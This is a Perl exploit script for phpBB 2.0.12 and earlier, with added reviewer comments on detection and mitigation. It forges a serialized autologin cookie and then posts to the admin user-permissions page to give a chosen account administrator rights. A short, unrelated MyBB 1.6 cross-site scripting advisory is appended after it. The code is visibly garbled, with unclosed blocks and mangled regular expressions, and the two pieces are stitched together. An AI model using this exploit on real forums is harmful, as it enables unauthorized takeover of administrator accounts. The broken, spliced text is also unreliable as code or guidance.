#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulnerability in the autologinid variable
# More:
# Just gives a user on a vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas,
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
# Usage guard: the script expects at least three arguments (site, phpBB
# folder, username); a fourth argument, the proxy, is optional.
# NOTE(review): this listing is extraction-damaged -- the usage string and
# the if-block opened here are never closed, so it does not compile as shown.
if (@ARGV < 3)
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +Usage: perl [site] [phpbb folder] [username] [proxy (optional)]i.e. perl /forum/ BigAdmin ++
use strict;
use LWP::UserAgent;
# Command-line arguments are used as given, with no validation; host and path
# are appended to "http://" to form the request URL.
my $host = $ARGV[0];my $path = $ARGV[1];my $user = $ARGV[2];my $proxy = $ARGV[3];my $request = "http://";$request .= $host;$request .= $path;
# Creates an LWP user agent with a cookie jar and pre-loads a single cookie,
# phpbb2mysql_data, scoped to path "/" on $host. URL-decoded, the value is a
# PHP-serialized two-element array with the keys "autologinid" and "userid":
# autologinid is a serialized boolean (b:1) rather than a string token, and
# userid is the string "2".
# NOTE(review): presumably the boolean is there to satisfy a loosely typed
# comparison of the auto-login token on the server -- confirm against the
# phpBB session code.
# Detection: a phpbb2mysql_data cookie whose autologinid field has serialized
# type "b" instead of "s" should not come from a normal client and is worth
# alerting on in request logs or at a WAF.
# Mitigation: the header comment gives the affected range as <= 2.0.12, so
# upgrade past it; in general, type-check (or do not deserialize) session
# data that arrives from the client.
use HTTP::Cookies;my $browser = LWP::UserAgent->new ();my $cookie_jar = HTTP::Cookies->new( );$browser->cookie_jar( $cookie_jar );$cookie_jar->set_cookie( "0", "phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1 %3Bs %3A6%3A". "%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/", $host, , , , ,);
# Optional proxy: appears intended to drop the scheme prefix from the
# argument before registering it as the HTTP proxy for the user agent.
if ( defined $proxy) {$proxy =~ s/(http://)//eg;$browser->proxy("http" , "http://$proxy");
# Probe step: requests the forum URL with the pre-loaded cookie and aborts
# on any non-success HTTP status.
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
# The body is searched for the literal "phpbbprivmsg"; its presence is taken
# as the sign that the forum accepted the cookie.
# NOTE(review): presumably this marker only appears in pages rendered for a
# logged-in user -- confirm against the phpBB templates.
# Detection: a session that reaches logged-in pages without a preceding
# request to the login form is the pattern to look for in access logs.
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}
# User lookup step: captures the text after "sid=" in the previous response
# (using the character class as written) and stores it in $sid; the capture
# is used without checking that the match succeeded.
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";$response->content =~ /sid=([wd]*)/;my $sid = $1;
# Appends admin/admin_ug_auth.php?mode=user&sid=... to the URL and posts the
# lookup form with the fields username, mode (listed twice) and submituser.
# Detection: POSTs to admin/admin_ug_auth.php from a client that never
# authenticated through the normal login are worth alerting on.
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";$response = $browser->post($request,
['username' => $user,'mode' => 'edit','mode' => 'user','submituser' => 'Look+up+User'],
die "Error: ", $response->status_line
unless $response->is_success;
# Reads the numeric user id from the name="u" value="..." attribute pair in
# the returned page; exits if it is absent, otherwise keeps it in $uid.
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }my $uid = $1;
# Privilege change step: posts userlevel=admin for the looked-up id ($uid)
# to the same admin URL and aborts on a non-success HTTP status.
# The success message is printed on HTTP success alone; the script does not
# verify that the user level actually changed.
# Response guidance: after patching, audit the forum's user table for
# accounts whose level was raised to admin unexpectedly and review the
# access logs for requests to admin/admin_ug_auth.php.
print "Trying to give user:$user admin status...\n";
$response = $browser->post($request,
['userlevel' => 'admin','mode' => 'user','adv'=>'','u'=> $uid,'submit'=> 'Submit'],
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";
==============================================
MYBB 1.6 (admin/index.php) XSS Vulnerabilities
==============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
Name : MYBB 1.6 XSS Vulnerabilities in admin/index.php
Date : August, 15 2010
Vendor Url : : Sid3^effects aKa HaRi <shell_c99[at]>Big hugs : Th3 RDX
special thanks to : r0073r (,L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr
greetz to ,trent Dillman,All ICW members and my friends luv y0 guyz
Happy Independence day to all Pakistani and Indians
#######################################################################################################
MyBB contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the
application does not validate the input that is passed to it.
Xploit: XSS Vulnerabilities
XSS vulnerabilities are found in the following:
* Add New Forum
* Create New Theme
* Smilies
* Post Icons
* Custom profile
###############################################################################################################
DEMO URLs:
###############################################################################################################
STEP :
* Log in first (the affected options are reached through admin/index.php, so this presumably requires an admin control-panel session).
* Go to the options, insert the XSS scripts, and check the forum.
###############################################################################################################
# 0day no more
# Sid3^effects
NB; Hanya sekedar berbagi ilmu semoga bermanfaat.
klu ada yg salah mohon disempurnakan....oke Trims.
